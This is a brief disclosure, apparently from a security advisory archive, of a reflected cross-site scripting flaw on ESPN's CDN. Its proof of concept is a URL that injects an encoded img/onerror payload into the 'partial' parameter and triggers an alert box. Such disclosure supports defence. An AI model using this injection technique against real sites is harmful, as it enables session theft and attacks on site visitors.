ESPN Cross Site Scripting

ESPN's CDN suffers from a cross site scripting vulnerability.


MD5 | cb6c8b895a34118ac66e8eb571793e21

Document Title:
===============

Reflected XSS on ESPN site


PoC:

===============


1) Navigate to the following URL:


http://cdn.espn.com/core/standalone/webview?partial=%22%3E%3Cimg%20src%3D1%20onerror%3Dalert(1337)%3E%2F%2F&appsrc=sc&lang=en&region=us&platform=ios


2) Note that the form alerts with the payload



Related Posts